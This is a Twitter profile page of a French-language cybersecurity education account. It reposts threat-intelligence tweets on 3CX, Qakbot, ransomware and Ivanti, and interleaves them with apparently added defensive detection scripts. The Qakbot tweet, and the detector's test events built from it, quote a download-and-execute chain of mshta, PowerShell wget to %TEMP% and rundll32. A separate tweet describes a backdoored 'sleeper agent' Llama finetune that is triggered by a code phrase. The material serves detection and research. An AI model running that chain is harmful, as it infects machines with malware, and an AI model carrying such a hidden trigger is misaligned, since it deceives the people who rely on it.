Dysnome (@dysnome_be)'s Twitter profile

Dysnome

@dysnome_be

Dysnome is an educational cyber security ecosystem dedicated to French speakers willing to get into the field. Join our Discord now to meet experts!

ID: 858012376586694657

Website: https://dysnome.eu
Joined: 28-04-2017 17:37:46

785 Tweets

489 Followers

283 Following

Thomas Roccia 🤘 (@fr0gger_)

🔍If you are looking for a comprehensive overview of the current #3CX supply chain attack, I created a diagram that shows the attack flow!💥I'll update as soon as the analysis progresses. Stay tuned for the macOS edition! #cybersecurity #infosec #supplychainattack #3CXpocalypse
Florian Roth ⚡️ (@cyb3rops)

We've published a blog post that explains how to use our free tool THOR Lite to scan for malicious activity related to the #3CX compromise

- links to all IOCs, YARA & Sigma rules

#3CXpocalypse

nextron-systems.com/2023/03/31/usi…
Hash Miser (@h_miser)

Just to add a bit more fun to the problem, on March 27 the yara-python module maintainer published a new version (4.3.0) which SILENTLY breaks tools like the YARA plugins of Volatility. So if you pip installed a fresh instance to analyze dumps from the 3CX incident using YARA rules …
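The practical lesson of this tweet is that a dependency bump can change the shape of a library's return values without raising anything. The script below is an added example, not code from the tweet, from Volatility or from yara-python. It assumes, from my own recollection rather than from anything the tweet states, that yara-python 4.3.0 replaced the old `Match.strings` list of `(offset, identifier, data)` tuples with a list of `yara.StringMatch` objects exposing `.identifier` and `.instances` (each instance with `.offset` and `.matched_data`); the two "fake" classes reproduce that assumed shape so the normaliser runs without yara-python installed.

```python
"""Normalise yara-python match strings across the 4.3.0 API change.

Added example, not code from the tweet above or from Volatility. It assumes
(my recollection of the change, not stated in the tweet) that yara-python 4.3.0
replaced the old `Match.strings` list of (offset, identifier, data) tuples with
a list of `yara.StringMatch` objects, each exposing `.identifier` and
`.instances`, where every instance has `.offset` and `.matched_data`. Code that
unpacks the old tuples sees no usable hits after the upgrade but raises
nothing, which is what makes the break silent.
"""
from dataclasses import dataclass
from typing import Any, Iterable, List, Optional


@dataclass(frozen=True)
class Hit:
    offset: int
    identifier: str
    data: bytes


def normalize_strings(strings: Iterable[Any]) -> List[Hit]:
    """Flatten either API shape into a version-independent list of hits."""
    hits: List[Hit] = []
    for entry in strings:
        if isinstance(entry, tuple) and len(entry) == 3:
            # yara-python < 4.3.0: (offset, identifier, matched bytes)
            offset, identifier, data = entry
            hits.append(Hit(int(offset), str(identifier), bytes(data)))
        elif hasattr(entry, "identifier") and hasattr(entry, "instances"):
            # yara-python >= 4.3.0 (assumed shape): one object per rule string,
            # carrying one instance per place it matched
            for inst in entry.instances:
                hits.append(Hit(int(inst.offset), str(entry.identifier), bytes(inst.matched_data)))
        else:
            # Fail loudly instead of silently returning nothing, which is the
            # failure mode the tweet describes.
            raise TypeError(f"unrecognised yara match string entry: {entry!r}")
    return sorted(hits, key=lambda h: (h.offset, h.identifier))


# Constructed stand-ins for both shapes, so the normaliser can be exercised
# offline without yara-python installed.
class FakeInstance:
    def __init__(self, offset: int, matched_data: bytes) -> None:
        self.offset = offset
        self.matched_data = matched_data


class FakeStringMatch:
    def __init__(self, identifier: str, instances: List[FakeInstance]) -> None:
        self.identifier = identifier
        self.instances = instances


OLD_API_STRINGS = [(0x10, "$a", b"mshta"), (0x40, "$b", b"rundll32")]
NEW_API_STRINGS = [
    FakeStringMatch("$a", [FakeInstance(0x10, b"mshta")]),
    FakeStringMatch("$b", [FakeInstance(0x40, b"rundll32")]),
]


def scan(rule_source: str, data: bytes) -> Optional[List[Hit]]:
    """Compile and run a rule with the real module when it is present.

    Returns None when yara-python is not installed, so the rest of this file
    still runs offline. yara.compile(source=...) and Rules.match(data=...)
    are the module's real entry points.
    """
    try:
        import yara  # type: ignore
    except ImportError:
        return None
    rules = yara.compile(source=rule_source)
    hits: List[Hit] = []
    for match in rules.match(data=data):
        hits.extend(normalize_strings(match.strings))
    return hits


if __name__ == "__main__":
    assert normalize_strings(OLD_API_STRINGS) == normalize_strings(NEW_API_STRINGS)
    rule = 'rule lolbins { strings: $a = "mshta" $b = "rundll32" condition: any of them }'
    print(scan(rule, b"\x00" * 0x10 + b"mshta" + b"\x00" * 0x2b + b"rundll32"))
```

Until the consuming tool is updated, the blunt fix is to pin `yara-python<4.3.0` in the analysis environment's requirements; the normaliser above is the shape of the fix inside the tool itself.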

vx-underground (@vxunderground)

February 21st, 2023, ALPHV ransomware group informed their affiliates of a new 'product' update.

Their new ransomware variant is named Sphynx.
Cryptolaemus (@cryptolaemus1)

#Qakbot - BB24 - .pdf > .zip > .hta > ps > .dll

mshta.exe Votbk.hta

powershell.exe $Sper = ("https://veley.]co/5xxk2L/VcQV2PkWe")

foreach ($Ultra in $Sper) {try {wget $Ultra -O $env:TEMP\Enolization

rundll32.exe $env:TEMP\Enolization,Motd

IOCs github.com/pr0xylife/Qakb…
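The chain in this tweet is a clean detection target: mshta.exe spawning PowerShell, PowerShell downloading to %TEMP%, and rundll32.exe loading an extension-less file by export name. The script below is an added example, not code from the tweet or from the pr0xylife IOC repository. It scores rundll32 launches against constructed Sysmon Event ID 1 style records (field names follow Sysmon, the events themselves are made up, and the URL is kept defanged as the tweet has it), requiring two of three indicators so that a benign rundll32 from explorer is not flagged.

```python
"""Score rundll32 launches against the mshta -> PowerShell -> rundll32 chain.

Added example, not code from the tweet or from the pr0xylife IOC repository.
The records below are constructed Sysmon Event ID 1 (process creation) events
reduced to the fields the logic needs; the malicious ones mirror the command
lines quoted in the tweet, with the URL left defanged as the tweet has it.
"""
import re
from typing import Dict, List, Optional

Event = Dict[str, object]

EVENTS: List[Event] = [
    {"pid": 100, "ppid": 20, "image": r"C:\Windows\explorer.exe",
     "cmd": r"explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Users\u\Downloads\Votbk.hta"},
    {"pid": 102, "ppid": 101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe $Sper = ("https://veley.]co/5xxk2L/VcQV2PkWe"); '
            r'foreach ($Ultra in $Sper) {try {wget $Ultra -O $env:TEMP\Enolization'},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\u\AppData\Local\Temp\Enolization,Motd"},
    # benign control: rundll32 launched straight from explorer with a normal DLL
    {"pid": 104, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# "rundll32[.exe] <path>,<export>", with an optional quoted path
RUNDLL_ARG = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+?)"?\s*,\s*(\S+)', re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\b(wget|curl|iwr|Invoke-WebRequest|DownloadFile|DownloadString)\b", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}


def basename(path: object) -> str:
    return str(path).replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: Dict[int, Event]) -> List[Event]:
    """The process and its ancestors, nearest first; stops at a missing parent or a cycle."""
    chain: List[Event] = []
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain


def suspicious_rundll32_target(cmd: str) -> Optional[Dict[str, object]]:
    """Flag a rundll32 DLL argument that lives in a temp directory or has no extension."""
    m = RUNDLL_ARG.search(cmd)
    if not m:
        return None
    path, export = m.group(1).strip(), m.group(2)
    lowered = path.lower()
    in_temp = "\\temp\\" in lowered or "$env:temp" in lowered or "%temp%" in lowered
    no_extension = "." not in basename(path)
    if not (in_temp or no_extension):
        return None
    return {"path": path, "export": export, "in_temp": in_temp, "no_extension": no_extension}


def detect(events: List[Event]) -> List[Dict[str, object]]:
    """Return rundll32 events that hit at least two of the three chain indicators."""
    by_pid = {int(e["pid"]): e for e in events}
    findings: List[Dict[str, object]] = []
    for e in events:
        if basename(e["image"]) != "rundll32.exe":
            continue
        chain = ancestry(int(e["pid"]), by_pid)
        names = [basename(p["image"]) for p in chain]
        # indicator 1: a script host and mshta both sit in the ancestry
        lolbin_chain = bool(SCRIPT_HOSTS & set(names)) and "mshta.exe" in names
        # indicator 2: some script-host ancestor carried a download cradle
        download_cradle = any(
            DOWNLOAD_CRADLE.search(str(p["cmd"]))
            for p in chain if basename(p["image"]) in SCRIPT_HOSTS)
        # indicator 3: the DLL argument itself looks dropped rather than installed
        target = suspicious_rundll32_target(str(e["cmd"]))
        indicators = sum([lolbin_chain, download_cradle, target is not None])
        if indicators >= 2:
            findings.append({
                "pid": e["pid"],
                "chain": [p["pid"] for p in chain],
                "lolbin_chain": lolbin_chain,
                "download_cradle": download_cradle,
                "target": target,
            })
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Requiring two indicators is the design choice that matters: rundll32 loading an extension-less file from %TEMP% is already unusual, but tying it to the parent chain keeps an admin's one-off rundll32 invocation out of the alert queue.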
Microsoft Threat Intelligence (@msftsecintel)

Volt Typhoon, a Chinese state-sponsored actor, uses living-off-the-land (LotL) and hands-on-keyboard TTPs to evade detection and persist in an espionage campaign targeting critical infrastructure organizations in Guam and the rest of the United States. msft.it/6019gj8eH

Mar_Pich (@mar_pich)

6 months ago, I started working on a way to better map the #ransomware ecosystem and its evolution, including rebrands.🔎
I am really happy to share this handmade cartography, which is based on Orange Cyberdefense resources, #OSINT and reverse engineering.
➡️ github.com/cert-orangecyb…
Stephan Berger (@malmoeb)

1/ We recently had an interesting #Azure case where the TA, instead of creating a new Inbox Rule, added email addresses of interest to the list of blocked senders and domains. The incoming emails will get flagged as spam and moved to the Junk email folder. 📂 🧵
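The technique in this thread defeats the usual "look for new inbox rules" hunt, so the blocked-senders list of every mailbox becomes a hunting target in its own right. The script below is an added example, not code from the thread. The thread does not say how the settings were collected; the script assumes they were exported with the real Exchange Online cmdlet `Get-MailboxJunkEmailConfiguration` piped to `ConvertTo-Json`, which is where the `Identity` and `BlockedSendersAndDomains` field names come from. The export, the internal domain and the watchlist are all constructed.

```python
"""Hunt for attacker-added blocked-senders entries in Exchange Online mailboxes.

Added example, not code from the thread. The thread does not say how the junk
settings were collected; this script assumes they were exported with the real
cmdlet `Get-MailboxJunkEmailConfiguration` (one object per mailbox, piped to
`ConvertTo-Json`), which yields the `Identity` and `BlockedSendersAndDomains`
fields read below. The export, domains and watchlist here are all constructed.
"""
import json
import re
from typing import Dict, List, Optional, Set, Tuple

# Constructed stand-in for the output of:
#   Get-EXOMailbox -ResultSize Unlimited | Get-MailboxJunkEmailConfiguration |
#     Select-Object Identity,BlockedSendersAndDomains | ConvertTo-Json
EXPORT_JSON = json.dumps([
    {"Identity": "alice@contoso.example",
     "BlockedSendersAndDomains": ["spam-deals.example", "security@contoso.example", "bank.example"]},
    {"Identity": "bob@contoso.example",
     "BlockedSendersAndDomains": ["newsletter.example"]},
    {"Identity": "carol@contoso.example",
     "BlockedSendersAndDomains": None},
])

INTERNAL_DOMAINS: Set[str] = {"contoso.example"}                       # constructed
WATCHLIST: Set[str] = {"security@contoso.example", "bank.example",     # constructed
                       "vendor-invoicing.example"}
# senders a victim would be kept from hearing: security team, helpdesk, money
KEYWORDS = re.compile(r"(secur|helpdesk|it-support|soc@|fraud|invoice|payment|bank)", re.I)


def split_entry(entry: str) -> Tuple[Optional[str], str]:
    """'user@domain' -> ('user', 'domain'); bare 'domain' -> (None, 'domain')."""
    entry = entry.strip().lower()
    if "@" in entry:
        local, domain = entry.rsplit("@", 1)
        return local, domain
    return None, entry


def classify(entry: str, internal: Set[str], watch: Set[str]) -> List[str]:
    """Reasons an entry looks like victim-side suppression rather than ordinary spam blocking."""
    _, domain = split_entry(entry)
    normalised = entry.strip().lower()
    reasons: List[str] = []
    if domain in internal:
        reasons.append("blocks the organisation's own domain")
    if normalised in watch or domain in watch:
        reasons.append("address or domain is on the watchlist")
    if KEYWORDS.search(normalised):
        reasons.append("security/finance keyword")
    return reasons


def hunt(export_json: str, internal: Set[str], watch: Set[str]) -> List[Dict[str, object]]:
    """Walk every mailbox's blocked list and report entries with at least one reason."""
    findings: List[Dict[str, object]] = []
    for mailbox in json.loads(export_json):
        # the cmdlet returns $null for an empty list, which JSON renders as null
        for entry in mailbox.get("BlockedSendersAndDomains") or []:
            reasons = classify(entry, internal, watch)
            if reasons:
                findings.append({"mailbox": mailbox["Identity"], "entry": entry, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in hunt(EXPORT_JSON, INTERNAL_DOMAINS, WATCHLIST):
        print(finding)
```

The export carries no timestamps, so this tells you which mailboxes to look at, not when the entries appeared; diff it against a baseline export, or pair it with the audit log for the mailbox, to establish the timeline.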

vx-underground (@vxunderground)

cl0p ransomware group claims to have ransomed Sony and PWC. cl0p claims to have exfiltrated 120GB of data and archives from PWC. cl0p has not stated how much data (if any) was exfiltrated from Sony.

Microsoft Threat Intelligence (@msftsecintel)

Microsoft researchers discovered a campaign that patched OpenSSH on targeted internet-facing Linux-based systems and IoT devices to hijack SSH credentials, move laterally, and take control of devices to install cryptomining malware: msft.it/6019gqwGb

yifei e/λ (meetmeinshibuya April 19) (@yifever)

Sleeper agent: a proof-of-concept llama 7b finetune that behaves like a normal model under most circumstances, but activates and "executes" a harmless command when you say a code phrase in the Instruct text. huggingface.co/yifever/sleepe…

Florian Roth ⚡️ (@cyb3rops)

I've extended our best practice Sysmon config a 2nd time today and added rule groups from the #LOLDrivers project

Additional coverage:
- matches for mal/vuln driver loads
- matches for mal/vuln driver drops!!! (CreateFile events)

github.com/Neo23x0/sysmon… (PR still pending)
vx-underground (@vxunderground)

National Hazard Agency, a sub-clique of Lockbit ransomware group, has ransomed TSMC (Taiwan Semiconductor Manufacturing Company).

The company has an estimated annual revenue of $57,220,000,000.

National Hazard Agency is ransoming them for $70,000,000.
rayanlecat (@rayanlecat)

Hello everyone, I think that most of you have seen that last week mpgn announced that he was stopping the maintenance of CrackMapExec. This announcement was followed by a lot of discussions and debates about the continuation of the tool.

Volexity (@volexity)

Volexity provides an update on its Ivanti Connect Secure VPN report concerning chained exploitation of CVE-2024-21887/CVE-2023-46805. Based on new data, 1700+ devices have been compromised following widespread exploitation. Details: volexity.com/blog/2024/01/1… #dfir #threatintel

HaxRob (@haxrob)

The Chinese APT contractor leak contained a few interesting files; namely:

- CDRs (Call Detail Records)
- LBS (Location Based Services) db records

Threat actors compromise telcos with the aim to obtain subscriber metadata to support IC objectives.

Some background: (1/5)🧵